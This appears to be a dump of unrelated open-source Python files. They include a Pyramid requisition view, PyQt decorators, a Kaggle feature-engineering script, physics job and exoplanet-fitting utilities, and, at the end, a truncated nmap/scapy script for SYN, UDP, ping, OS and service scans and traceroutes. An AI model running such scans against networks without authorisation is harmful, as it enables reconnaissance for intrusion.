373036442caf5434eca6150ae45a796bba5f9009 | d8ffe7b6613d84835e2b7f9a2984dd78770e1885 | /opensupply/views/requisition.py | e11b7474f257b9f58c374b8a82e8420ed29c174d | [] | no_license | etoko/opensupply | 248cfb58c0b745df48272f2b705774c6a73c546b | 04d674cc57c2f20b0b87f51c1a85c8a98b05055a | refs/heads/master | 2020-04-05T12:34:42.770428 | 2017-08-01T04:25:13 | 2017-08-01T04:25:13 | 95,153,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,247 | py |
import json
from datetime import datetime
import transaction
from pyramid.httpexceptions import (
exception_response,
HTTPFound,
HTTPNotFound,
HTTPForbidden,
)
from pyramid.renderers import render_to_response
from pyramid.response import Response
from pyramid.static import static_view
from pyramid.security import authenticated_userid, forget, remember
from pyramid.view import view_config
from sqlalchemy.exc import IntegrityError
from opensupply.controllers import (
RequisitionController,
DepartmentController,
UserController,
PermissionController,
)
from opensupply.security import USERS
from opensupply.models import User
from opensupply.util import operations
from opensupply.models import DBSession
requisition_controller = RequisitionController()
user_controller = UserController()
permission_controller = PermissionController()
department_controller = DepartmentController()
@view_config(route_name = "requisitions_first", renderer="json")
def requisition_first(request):
"""
View to navigate to the first requisition
"""
requisition = requisition_controller.get(FIRST=True)
return requisition.to_dict
@view_config(route_name="requisitions_previous", renderer="json")
def requisition_previous(request):
"""
Navigate to previous requisition
"""
# requisition_id = request.params["requisition_id"]
# requisition_id = int(requisition_id)
# requisition_id = requisition_id - 1
# requisition = requisition_controller.get(requisition_id)
#requisition_id = request.params["requisition_id"]
#requisition_id = int(requisition_id)
#requisition = requisition_controller.get(requisition_id)
#requisition = requisition.previous()
#j_requisition = json.dumps(requisition.to_dict)
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
requisition = requisition.previous()
return requisition.to_dict
@view_config(route_name="requisitions_next", renderer="json")
def requisition_next(request):
"""
Navigate to previous requisition
"""
#requisition_id = request.params["requisition_id"]
#requisition_id = int(requisition_id)
#requisition_id = requisition_id + 1
#requisition = requisition_controller.get(requisition_id)
#requisition = requisition.next()
#j_requisition = json.dumps(requisition.to_dict)
#return j_requisition
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
requisition = requisition.next()
return requisition.to_dict
@view_config(route_name="requisitions_last", renderer="json")
def requisition_last(request):
"""
View to navigate to the last requisition
"""
requisition = requisition_controller.get(LAST=True)
return requisition.to_dict
@view_config(route_name="requisitions_save", renderer="json")
def requisition_save(request):
"""
Called after user clicks save button
"""
j_requisition = {}
requisition_id = request.params['requisition_id']
department_id = request.params["requisition_department"]
expected_date = request.params["requisition_expected_date"]
j_requisition = {
'requisition_id' : requisition_id,
'department_id': department_id,
'expected_date': expected_date,
#'notes': notes
}
requisition = requisition_controller.save(j_requisition)
return requisition.to_dict
@view_config(route_name="requisitions_delete", renderer="json")
def requisition_delete(request):
"""
Called to invoke a delete operation
"""
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
next_requisition = requisition.next()
print(next_requisition)
if requisition_controller.delete(requisition):
return json.dumps(next_requisition.to_dict)
| [
"emmanuel.toko@gmail.com"
] | emmanuel.toko@gmail.com |
fad2bafe876e26e6aeabeb0f5e9d3bccfbba8ef8 | 788874e01754f6634b536eeac43552063c105a43 | /functions/decorators.py | 33ac645eff6d1c48a3ed374be3f273ce51a73a4a | [] | no_license | ycli0536/GeoModeling | 1e73508810212bf5c847a73dfe4649bd906e132f | 57197bbde0a472e77144647467fbd7553973a7f6 | refs/heads/master | 2023-06-10T20:28:58.822419 | 2021-06-30T07:04:40 | 2021-06-30T07:04:40 | 368,754,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | from PyQt5.QtWidgets import QMessageBox
def track_error(func):
def wrapper(self):
try:
func(self)
except Exception as e:
QMessageBox.information(self, 'Test Error', str(e), QMessageBox.Yes)
return wrapper
def track_error_args(func):
def wrapper(self, *args, **kwargs):
try:
result = func(self, *args, **kwargs)
return result
except Exception as e:
QMessageBox.information(self, 'Test Error', str(e), QMessageBox.Yes)
return wrapper
def finished_reminder(func):
def wrapper(self):
func(self)
QMessageBox.information(self, 'Finished', 'Task finished.', QMessageBox.Yes)
return wrapper
def finished_reminder_new(win_title, info):
def deco_func(func):
def wrapper(self):
func(self)
QMessageBox.information(self, win_title, info, QMessageBox.Yes)
return wrapper
return deco_func()
def not_finished_yet(func):
def wrapper(self):
func(self)
QMessageBox.information(self, 'Information', 'NOT FINISHED YET...', QMessageBox.Yes)
return wrapper
| [
"lyc05366627@gmail.com"
] | lyc05366627@gmail.com |
a8bf5034a92d0e71d35bafc0166787ac78929292 | 98d7cc2690c8d632a2a8d8867c0d6b2dfab2f13f | /code_featureEngineer/demo0226_logVolDic_discrete01location_missingValue_xgboost_differentFea.py~ | e99a70652af3459398ad05ce2bcfa95483c20b6f | [] | no_license | 2877992943/telstra_binary_classification | f55b6d418486881193f0f3b3eca32d0de710a08a | f3d6fe2e25cd7539c30dbdcd617e2513b2678cce | refs/heads/master | 2021-01-01T05:14:31.284945 | 2016-05-13T02:21:10 | 2016-05-13T02:21:10 | 58,692,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,875 | #!/usr/bin/env python
# encoding=utf-8
"""
discrete fea count
"""
import pandas as pd
import numpy as np
import xgboost as xgb
from scipy.optimize import fmin_powell
from ml_metrics import quadratic_weighted_kappa
import cPickle
import pylab as plt
dataPath='/home/yr/telstra/'
def eval_wrapper(yhat, y): #pred true
y = np.array(y);print y[:10]
y = y.astype(int);print yhat[:10]
yhat = np.array(yhat)
#yhat = np.clip(np.round(yhat), np.min(y), np.max(y)).astype(int)
#####accuracy
#err=np.sum((y-yhat)*(y-yhat))/float(y.shape[0])
#return err
#######-loglikely
return np.mean(-np.log(yhat+0.00001)*y-(1.-y)*np.log(1.-yhat+0.00001) )
#return quadratic_weighted_kappa(yhat, y)
def get_params(maxDepth):
plst={
"objective": 'multi:softprob',#"binary:logistic",
"booster": "gbtree",
"eval_metric": "auc",
"eta": 0.01, # 0.06, #0.01,
#"min_child_weight": 240,
"silent":1,
"subsample": 0.75,
"colsample_bytree": 0.68,
"max_depth": maxDepth,
"num_class":3
}
return plst
def pad(train):
train.v22.fillna('',inplace=True)
padded=train.v22.str.pad(4)
spadded=sorted(np.unique(padded))
v22_map={}
c=0
for i in spadded:
v22_map[i]=c
c+=1
train.v22=padded.replace(v22_map,inplace=False)
return train
def save2pickle(c,name):
write_file=open(dataPath+str(name),'wb')
cPickle.dump(c,write_file,-1)#[ (timestamp,[motion,x,y,z]),...]
write_file.close()
def load_pickle(path_i):
f=open(path_i,'rb')
data=cPickle.load(f)#[ [time,[xyz],y] ,[],[]...]
f.close()
#print data.__len__(),data[0]
return data
def str2dummy(fea_xi,allFeaList,logVolumeDic_xi):#allFeaList [string,...]1921
#print 'fea xi',len(fea_xi) #9 nonzero dimention->1920dim 0-1 vec
vec01=[]
#remove volume(int) in fea_xi,allFeaList
#allFeaList=[f for f in allFeaList if type(f)==str]
#fea_xi=[f for f in fea_xi if type(f)==str ]
#
for fi in allFeaList:#for each string_fea in 1921 ,include: string int
if fi in fea_xi:#'log_feature'
#print fi
v=[logVolumeDic_xi[fi] if type(fi)==str and 'feature' in fi else 1][0]
vec01.append(v)
else:vec01.append(0)
return np.array(vec01)
def get_logVolume(patch):
dic={}
log=np.unique(patch.log_feature.values)
for logI in log:
volumeI=np.unique(patch[patch.log_feature==logI].volume.values)[0]
dic[logI]=volumeI
return dic
def howMany(strFi_short,strList_xi):
num=0
for strI in strList_xi:
if type(strI)==str and strFi_short in strI:
num+=1;#print strI
return num
def uniqueInorder(strArr) : #arr[str] ->list
lis=[]
for strI in strArr:
if strI not in lis:lis.append(strI)
return lis
def normal(xi_dic,normDic):#{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20}
for k,v in normDic.items():
while len(xi_dic[k])<v:
xi_dic[k].append(-1)
#xi={'event_type': ['34', '35', -1, -1, -1, -1, -1, -1, -1, -1, -1], 'feature': ['312', '232', -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1], 'severity_type': ['2'], 'volume': [11, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1], 'location': ['460'], 'resource_type': ['2', -1, -1, -1, -1]}
#get values ,transform into int
return xi_dic
if __name__=='__main__':
#load ->merge ->count_value each fea->factorize ->fillna -> knn mean-> train cross valid
# XGBoost params:
print('Load data...')
train = pd.read_csv("../input/train.csv");
#print train.location.value_counts(),train.fault_severity.value_counts()
print '--train.csv'
for col in train.columns:
print col
print np.unique(train[col].values).shape
event_type=pd.read_csv('../input/event_type.csv')
print '--event_type.csv'
for col in event_type.columns:
print col
print np.unique(event_type[col].values).shape
log_feature=pd.read_csv('../input/log_feature.csv')
print '--log_feature.csv'
for col in log_feature.columns:
print col
print np.unique(log_feature[col].values).shape
resource_type=pd.read_csv('../input/resource_type.csv')
print '--resource_type.csv'
for col in resource_type.columns:
print col
print np.unique(resource_type[col].values).shape
severity_type=pd.read_csv('../input/severity_type.csv')
print '--severity_type.csv'
for col in severity_type.columns:
print col
print np.unique(severity_type[col].values).shape
target = train['fault_severity'];save2pickle(target.values,'target')
#train = train.drop(['ID','target'],axis=1)
test = pd.read_csv("../input/test.csv")
print '--test.csv'
for col in test.columns:
print col
print np.unique(test[col].values).shape
#ids = test['ID'].values
#test = test.drop(['ID'],axis=1)
####
###transform dataframe
trainTest=pd.concat([train,test],axis=0);print trainTest.values.shape
merge1=pd.merge(trainTest,event_type,on='id',how='left')
merge2=pd.merge(merge1,log_feature,on='id',how='left')
merge3=pd.merge(merge2,resource_type,on='id',how='left')
merge4=pd.merge(merge3,severity_type,on='id',how='left')
uniqueId= np.unique(merge4.id.values)
dataDic_count={};targetDic={};
mat=merge4.drop(['id','fault_severity'],axis=1).values;print mat.shape
allFeaList=list(np.unique(mat.flatten() ) )
print len(allFeaList)
for idi in uniqueId[:]:
#for each id
patch= merge4[ merge4['id']==idi ]
target=np.unique(patch.fault_severity.values)[0]
#print 'xi',patch
patch=patch.drop(['id','fault_severity'],axis=1)
#
#logVolumeDic=get_logVolume(patch);
#print logVolumeDic
#
#fea_xi discrete ->count
#{'event_type': ['34', '35'], 'feature': ['312', '232'], 'severity_type': ['2'], 'volume': [11, 6], 'location': ['460'], 'resource_type': ['2']}
fea_xi={}
for col in patch.columns:
fiStrList=uniqueInorder(patch[col].values)#['event 1','event 3',]
if type(fiStrList[0])==str: #['fea 1','fea 3']
for fi in fiStrList:
k,v= fi.split(' ')#'event_type 3'->['event_type','3']
if k not in fea_xi:fea_xi[k]=[v]
else:fea_xi[k].append(v)
else:#[ 4 5]volume
fea_xi['volume']=fiStrList
#get dummy fea
#fea01=str2dummy(fea_xi,allFeaList,logVolumeDic)#array [1000,]
#print fea01[np.nonzero(fea01)[0]],fea01.shape
#print fea_xi
#dataDic[idi]=fea01;#print fea01.shape
#fea_xi=normal(fea_xi,{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20,'volume':20})
#print fea_xi,fea_xi.values()
count={}
count['event_type_num']=len(fea_xi['event_type'])
count['resource_type_num']=len(fea_xi['event_type'])
count['feature_num']=len(fea_xi['feature'])
count['volume_num']=sum(fea_xi['volume'])
#feaXiList=[int(xii) for xi in fea_xi.values() for xii in xi ]
#print count
#print feaXiList,len(feaXiList)
dataDic_count[idi]=count.values()
targetDic[idi]=target
#print dataDic,targetDic
save2pickle([dataDic_count,targetDic,allFeaList],'dataTargetFeaAll_count')
#########
#get 01fea 1900(all01 include location),790(all01 except for location),combine count fea
#########
dataDicCount,_,_=load_pickle(dataPath+'dataTargetFeaAll_count')
#all 01 include location, notall01
dataDic_all01,dataDic_notall01,targetDic,allFeaList=load_pickle(dataPath+'dataTarget_FeaAll01_notall01')
dataDic_01_count={}
for idi,arr in dataDic_notall01.items()[:]:
count=np.array(dataDicCount[idi])
x=np.concatenate((count,arr))
dataDic_01_count[idi]=x;#print x.shape
save2pickle([dataDic_01_count,targetDic],'xy_dummy_Count')
"""
####see each xi ,at most how many event_type,
strFiDic={'event_type':0,'feature':0,'resource_type':0,'severity_type':0,'location':0}
#{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20}
dataDic,targetDic,allFeaList=load_pickle(dataPath+'dataTargetFeaAll_3')#{id:[strFea...]
for idi,strList in dataDic.items()[:]:#each xi
#print strList
for strFi_short,mostNum in strFiDic.items():
num=howMany(strFi_short,strList)
if num>mostNum:strFiDic[strFi_short]=num
print strFiDic
"""
####dataDic transform-> dataFrame
dataFrame={'id':[],'severity_type':[],'location':[],\
'event_type1':[],'event_type2':[],'event_type3':[],'event_type4':[],\
'event_type5':[],'event_type6':[],'event_type7':[],'event_type8':[],\
'event_type9':[],'event_type10':[],'event_type11':[],\
'resource_type1':[],'resource_type2':[],'resource_type3':[],'resource_type4':[],\
'resource_type5':[],\
'feature1':[],'feature2':[],'feature3':[],'feature4':[],'feature5':[],\
'feature6':[],'feature7':[],'feature8':[],'feature9':[],'feature10':[],\
'feature11':[],'feature12':[],'feature13':[],'feature14':[],'feature15':[],\
'feature16':[],'feature17':[],'feature18':[],'feature19':[],'feature20':[]}
"""
#split discrete variable 'bc'
print('Clearing...')
# v22 v56 v125 'bcn'remain,add more variable,err not decrease
train['v22_0']=train.v22.str[0];
train['v22_1']=train.v22.str[1];
train['v22_2']=train.v22.str[2];
train['v22_3']=train.v22.str[3];
train['v56_0']=train.v56.str[0];
train['v56_1']=train.v56.str[1];
train['v125_0']=train.v125.str[0];
train['v125_1']=train.v125.str[1];
train['v113_0']=train.v113.str[0]
train['v113_1']=train.v113.str[1]
strList=['v22','v56','125','113']
newfea=[]
for strI in strList:
for col in train.columns:
if col.find(strI+'_')!=-1:
print col
serial=train[col].values
print np.unique(serial).shape
print np.unique(serial)[:50]
#
s, tmp_indexer = pd.factorize(train[col])
print s.shape
newfea.append(s)
newfea=np.array(newfea).T#[d,n] ->[n,d]
print newfea.shape#[n,10]
save2pickle(newfea,'splitFea')
#pad v22
#train=pad(train)
#
"""
"""
#dropna not factorized,see complete dataset without nan
train1=train.dropna(axis=1,how='any')#12 fea with all value
train2=train.dropna(axis=0,how='any');print 'complete data',train2.values.shape #complete fea data
test2=test.dropna(axis=0,how='any')
train2test2=np.concatenate((train2.values,test2.values),axis=0);print train2test2.shape#not factorized
print 'all value fea',train1.columns
test1=test[train1.columns]
#train=train1;test=test1
#
# fill na ,factorize str feature
missFea=[];completeFea=[]
feaInd=-1
for (train_name, train_series), (test_name, test_series) in zip(train.iteritems(),test.iteritems())[:]:
feaInd+=1
# each columns,fea
valuePercnt_train=train[train_name].count()/float(train.values.shape[0])
valuePercnt_test=test[test_name].count()/float(test.values.shape[0])
#print 'non-nan value fea',train_name,train_series.dtype,valuePercnt_train,valuePercnt_test
##
if train_series.dtype == 'O':
#for objects: factorize
train[train_name], tmp_indexer = pd.factorize(train[train_name]);
#print np.unique(tmp_indexer).shape
test[test_name] = tmp_indexer.get_indexer(test[test_name])
if valuePercnt_test+valuePercnt_train<2.:missFea.append(feaInd)
else:completeFea.append(feaInd)
#but now we have -1 values (NaN)
else:
#print train_name,np.unique(train_series).shape
#for int or float: fill NaN with mean
if valuePercnt_test+valuePercnt_train<2.:
missFea.append(feaInd)
tmp_len = len(train[train_series.isnull()]);
if tmp_len>0:
train.loc[train_series.isnull(), train_name] = -1000
#and Test
tmp_len = len(test[test_series.isnull()])
if tmp_len>0:
test.loc[test_series.isnull(), test_name] = -1000
else:
completeFea.append(feaInd)
tmp_len = len(train[train_series.isnull()]);
if tmp_len>0:
train.loc[train_series.isnull(), train_name] = train_series.mean()
#and Test
tmp_len = len(test[test_series.isnull()])
if tmp_len>0:
test.loc[test_series.isnull(), test_name] = train_series.mean() #TODO
"""
"""
print len(missFea),len(completeFea)
##
missInd=list(np.where(train.values==-1)[0])+list(np.where(train.values==-1000)[0])
train1=train.drop(missInd,axis=0,inplace=False)
missInd=list(np.where(test.values==-1)[0])+list(np.where(test.values==-1000)[0])
test1=test.drop(missInd,axis=0,inplace=False)
train2test2=np.concatenate((train1,test1),axis=0);print 'complete data',train2test2.shape
save2pickle([missFea,completeFea,train.values,test.values,train2test2],'midData')
"""
"""
#####################
#xgboost
###################
# convert data to xgb data structure
missing_indicator=-1000
xgtrain = xgb.DMatrix(train.values, target.values,missing=missing_indicator);
#xgtest = xgb.DMatrix(test,missing=missing_indicator)
# train model
print('Fit different model...')
for boost_round in [50,100][:1]:
for maxDepth in [7,14][:1]:#7 14
xgboost_params = get_params(maxDepth)
# train model
#clf = xgb.train(xgboost_params,xgtrain,num_boost_round=boost_round,verbose_eval=True,maximize=False)
clf=xgb.train(xgboost_params,xgtrain,num_boost_round=boost_round)
# train error
train_preds = clf.predict(xgtrain, ntree_limit=clf.best_iteration)
print maxDepth,boost_round
print('Train err is:', eval_wrapper(train_preds, target.values))# 50 7 0.19
"""
"""
#test predict
print('Predict...')
test_preds = clf.predict(xgtest, ntree_limit=clf.best_iteration)
# Save results
#
preds_out = pd.DataFrame({"ID": ids, "PredictedProb": test_preds})
preds_out.to_csv("../acc_process_submission.csv")
#
"""
"""
{id:{event:[11 events at most for one xi] in order---------------53 kinds
feature:[20] -----------------386
resource:[5]------------------10
severity:[1]------------------------5
location:[1]-------------------------------929+1039
volume:[20]------------------------341
"""
| [
"2877992943@qq.com"
] | 2877992943@qq.com | |
bc0931805ad7e9284f0119c1ac19292c92649d57 | 3624e9f0a026b57ebdafa4e842b93f56e5a8504d | /Codeforces/CodeCraft 2015/Problem H/gen2.py | 46250d91b25f885c1db8bb12d779c6009c0ba217 | [
"MIT"
] | permissive | ailyanlu1/Competitive-Programming-2 | 54109c8644d3ac02715dc4570916b212412c25c0 | 6c990656178fb0cd33354cbe5508164207012f24 | refs/heads/master | 2020-03-23T07:48:20.560283 | 2018-02-15T06:49:49 | 2018-02-15T06:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | print 10**5,2
n = 10**5
for i in xrange(n):
print n-i,
| [
"adityapaliwal95@gmail.com"
] | adityapaliwal95@gmail.com |
464ebf186e3319a72253e12fa4a37890c21aa4a0 | 06a2dab18197a13fc3371debd29b476ae99cb01c | /T3/inputs/dnn2017.py | 3c0661637347e70ff855197b207c33c81ac06421 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | PandaPhysics/PandaAnalysis | 397a031f9e8d399be1814ab04dd525d69b41f060 | 3167d106d41dfce58219c3e07d30e201ee823b55 | refs/heads/master | 2021-06-18T13:52:57.650900 | 2019-04-08T17:35:29 | 2019-04-08T17:35:29 | 168,376,672 | 0 | 0 | NOASSERTION | 2019-04-08T17:33:55 | 2019-01-30T16:34:09 | C++ | UTF-8 | Python | false | false | 2,252 | py | #!/usr/bin/env python
from re import sub
from sys import argv,exit
from os import system,getenv,path
from time import clock,time
import json
which = int(argv[1])
submit_id = int(argv[2])
sname = argv[0]
argv=[]
import ROOT as root
from PandaCore.Tools.Misc import *
from PandaCore.Utils.load import *
import PandaCore.Tools.job_config as cb
import PandaAnalysis.Tagging.cfg_v8 as tagcfg
import PandaAnalysis.T3.job_utilities as utils
from PandaAnalysis.Flat.analysis import wlnhbb2017, breg
Load('PandaAnalyzer')
data_dir = getenv('CMSSW_BASE') + '/src/PandaAnalysis/data/'
def fn(input_name, isData, full_path):
logger.info(sname+'.fn','Starting to process '+input_name)
# now we instantiate and configure the analyzer
a = breg(True)
a.bjetBDTReg = True
a.bjetDeepReg = True
a.inpath = input_name
a.outpath = utils.input_to_output(input_name)
a.datapath = data_dir
a.isData = isData
utils.set_year(a, 2017)
a.processType = utils.classify_sample(full_path, isData)
if a.processType in {root.pa.kTT, root.pa.kH}:
a.reclusterGen = True # only turn on if necessary
skimmer = root.pa.PandaAnalyzer(a)
return utils.run_PandaAnalyzer(skimmer, isData, a.outpath)
if __name__ == "__main__":
sample_list = cb.read_sample_config('local.cfg',as_dict=False)
to_run = None #sample_list[which]
for s in sample_list:
if which==s.get_id():
to_run = s
break
if not to_run:
logger.error(sname,'Could not find a job for PROCID=%i'%(which))
exit(3)
outdir = getenv('SUBMIT_OUTDIR')
lockdir = getenv('SUBMIT_LOCKDIR')
outfilename = to_run.name+'_%i.root'%(submit_id)
processed = {}
utils.report_start(outdir,outfilename,to_run.files)
wd = utils.isolate()
utils.main(to_run, processed, fn)
utils.hadd(processed.keys())
utils.print_time('hadd')
ret = utils.stageout(outdir,outfilename)
utils.cleanup('*.root')
utils.un_isolate(wd)
utils.print_time('stageout and cleanup')
if not ret:
utils.report_done(lockdir,outfilename,processed)
utils.cleanup('*.lock')
utils.print_time('create lock')
else:
exit(-1*ret)
exit(0)
| [
"sidn@mit.edu"
] | sidn@mit.edu |
adc11ab3efac0ad1c5eeda997c8b80112d687ef1 | 5600396adac44f47acea8450431ff5a2bd010335 | /tests/asgi.py | 2362e20b7ae57051fb01efdad0f0cbbe91cd5526 | [
"Apache-2.0"
] | permissive | grantjenks/django-dblog | 83ee2aea496f46983a6850bca4b5a43e6abf2578 | c064b8018b4221ee7d6260cf6430b7cfa8dccee8 | refs/heads/main | 2023-08-27T23:03:22.351497 | 2022-03-12T21:25:37 | 2022-03-12T21:25:37 | 165,946,756 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
ASGI config for tests project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
application = get_asgi_application()
| [
"grant.jenks@gmail.com"
] | grant.jenks@gmail.com |
b1a5bd0d239833c755f17fd0956b32582769f29b | 08230e7d79e34930a309962e15e9a30323529b52 | /Unconfirmed 440008.crdownload | 17a2b917348cc68b7d866651dfb1babcdeda1a63 | [] | no_license | nathanmeagher/PH30116 | ede5d61012e8708c35db44f08ec92560cc1506b3 | 5fb33a7ad8f3fb47cacd8dbbee7e1a96ed2a5bee | refs/heads/master | 2020-08-10T23:25:38.341909 | 2019-12-19T15:54:25 | 2019-12-19T15:54:25 | 214,443,085 | 1 | 0 | null | 2019-10-11T13:26:58 | 2019-10-11T13:26:58 | null | UTF-8 | Python | false | false | 3,840 | crdownload | #!/usr/bin/env python
"""
Reading in and manipulating fits files
"""
import numpy as np
import pandas as pd
from scipy import optimize
from scipy.interpolate import interpn
def read_exopars(dataframe,par1='a',par2='Mstar',meth='RV'):
M_earth = 5.97
M_jupiter = 1898
method = dataframe[:,1]
filter = 'Radial Velocity'
# Return only data acquired with input method
if meth == 'RV':
filter = 'Radial Velocity'
elif meth == 'Transit':
filter = 'Transit'
elif meth == 'PT':
filter = 'Pulsar Timing'
elif meth == 'ML':
filter = 'Microlensing'
elif meth == 'Im':
filter = 'Imaging'
# Read in data from input dataframe, using filter on method
a = pd.to_numeric(dataframe[:,7][method==filter])
a_perr = pd.to_numeric(dataframe[:,8][method==filter])
a_nerr = pd.to_numeric(dataframe[:,9][method==filter])
a_err = [-1*a_nerr,a_perr]
Mstar = pd.to_numeric(dataframe[:,19][method==filter]) * (M_jupiter/M_earth)
Mstar_perr = pd.to_numeric(dataframe[:,20][method==filter]) * (M_jupiter/M_earth)
Mstar_nerr = pd.to_numeric(dataframe[:,21][method==filter]) * (M_jupiter/M_earth)
Mstar_err = [-1*Mstar_nerr,Mstar_perr]
return a,a_err,Mstar,Mstar_err
def linfit(xdata, ydata, yerr=None, pinit=[1.0,-1.0]):
#logx = np.log10(xdata)
#logy = np.log10(ydata)
#logyerr = yerr/ydata
pinit=[5.8,0.3]
yerr = np.full(len(xdata),0.1)
# Define function for calculating a power law
linfit = lambda p, x: p[0] + p[1] * x
linerr = lambda p, x, y, err: (y-linfit(p,x))/err
# Fit data with function defined above
out = optimize.leastsq(linerr,pinit,args=(xdata,ydata,yerr[0]), full_output=1)
# Determine best-fit parameters and associated errors
pfinal = out[0]
covar = out[1]
index = pfinal[1]
intercep = pfinal[0]
indexErr = np.sqrt( covar[1][1] )
intercepErr = np.sqrt( covar[0][0] )
return index,indexErr,intercep,intercepErr
def Zrecal(R23_met):
a = 664.8453
b=-225.7533
c=25.76888
d=-0.9761368
O3N2_met = a + (b*x) + (c * x**2) + (d * x**3)
return O3N2_met
def conflevels(x,y,nbins,confints=[0.99,0.95,0.68]):
# Make a 2d normed histogram
H,xedges,yedges=np.histogram2d(x,y,bins=nbins,normed=True)
norm=H.sum() # Find the norm of the sum
# Set contour levels
contour1=0.99
contour2=0.95
contour3=0.68
# Set target levels as percentage of norm
target1 = norm*contour1
target2 = norm*contour2
target3 = norm*contour3
# Take histogram bin membership as proportional to Likelihood
# This is true when data comes from a Markovian process
def objective(limit, target):
w = np.where(H>limit)
count = H[w]
return count.sum() - target
# Find levels by summing histogram to objective
level1= optimize.bisect(objective, H.min(), H.max(), args=(target1,))
level2= optimize.bisect(objective, H.min(), H.max(), args=(target2,))
level3= optimize.bisect(objective, H.min(), H.max(), args=(target3,))
# For nice contour shading with seaborn, define top level
level4=H.max()
levels=[level1,level2,level3,level4]
return levels
def density_scatter(x , y, ax=None, sort=True, bins=20,):
"""
Scatter plot colored by 2d histogram
"""
#if ax is None :
# fig , ax = plt.subplots()
data , x_e, y_e = np.histogram2d( x, y, bins = bins)
z = interpn( ( 0.5*(x_e[1:] + x_e[:-1]) , 0.5*(y_e[1:]+y_e[:-1]) ) , data , np.vstack([x,y]).T , method = "splinef2d", bounds_error = False )
# Sort the points by density, so that the densest points are plotted last
if sort :
idx = z.argsort()
x, y, z = x[idx], y[idx], z[idx]
#ax.scatter( x, y, c=z, **kwargs )
return z
| [
"nathanm3m@gmail.com"
] | nathanm3m@gmail.com |
314fe3ea19cb86cb5f90d1f8c202393b1bd22ebe | 264d1409febf9d58258c397e8586551776e513e5 | /Scanner.py | 44992aae24ed157010ae0a61f07c47d6b577d41d | [] | no_license | ParkerFrame/Scripts | 9a0fa9a07ac6b893777c023761d6d855d033c328 | 4fd5ac32c53bb7cdd2368020187d468fd64eedab | refs/heads/master | 2020-12-31T22:27:23.264642 | 2020-02-08T02:02:59 | 2020-02-08T02:02:59 | 239,054,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,747 | py | #!/usr/bin/python3
"""
Name: Parker Frame
Date: 2/7/2020
Description: This tool is used for some basic level scanning bu utlizing scapy and nmap python libraries. """
#imported the nmap library
import nmap
import time
from scapy.all import *
import fpdf
#store scanner tool, nmap version, tgt
scanner = nmap.PortScanner()
nmapVer = scanner.nmap_version()
#prep the pdf formation
pdf = fpdf.FPDF(format='letter')
pdf.add_page()
pdf.set_font("Arial", size=10)
print("Welcome to the best scanner on this side of the Mississippi! Please use this tool wisely and ethically or else Professor Miller will be upset.")
print('\n')
print("<--------------------------------------------------------->")
time.sleep(1)
print('\n')
#options for the user to choose from
userResponse = input("""\nPlease enter the type of scan you want to run: (All options except #4 can save results to PDF!)
1)SYN/ACK Scan (TCP)
2)UDP Scan
3)Ping Scan (ICMP)
4)Tracerroute
5)Comprehensive Scan (OS, Service, etc.) \n\n Choose from the above options (1-5) and press enter: """)
print("You have selected option: ", userResponse, " \n")
#start with tracerroute because its the simplest
if userResponse == '4':
from scapy.all import *
hostname = input("What domain or IP do you want to trace? (Ex. www.google.com, 192.168.1.153, etc.): ")
print("This might take a bit so just sit back and relax while we trace the route!")
print("If the trace gets stuck for too long then press Ctrl+C to end the trace.")
print("<--------------------------------------------------------->")
for i in range(1, 28):
pkt = IP(dst=hostname, ttl=i) / UDP(dport=33434)
# Send the packet and get a reply
reply = sr1(pkt, verbose=0)
if reply is None:
# No reply =(
break
elif reply.type == 3:
# We've reached our destination
print("Done!", reply.src)
break
else:
# We're in the middle somewhere
print("%d hops away: " % i , reply.src)
else:
ipAddr = input("Enter the target IP address you want to scan (Ex. 192.168.1.1, 192.168.1.0/24, 192.168.1-30.230-250, etc.): ")
print("The IP address you entered is: ", ipAddr)
type(ipAddr)
print('\n')
tgtPorts = input("Enter the port range you want to scan, if applicable (Ex. 22, 80-95, 1-1000, etc.): ")
print("The port range you entered is: ", tgtPorts)
type(tgtPorts)
print("This might take a bit so just sit back and relax while we scan away!")
print("<--------------------------------------------------------->")
#the other options are here
if userResponse == '1':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sS')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
#store data for pdf creation
pdfData = scanner.csv()
time.sleep(2)
# print(pdfData)
elif userResponse == '2':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sU')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['udp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
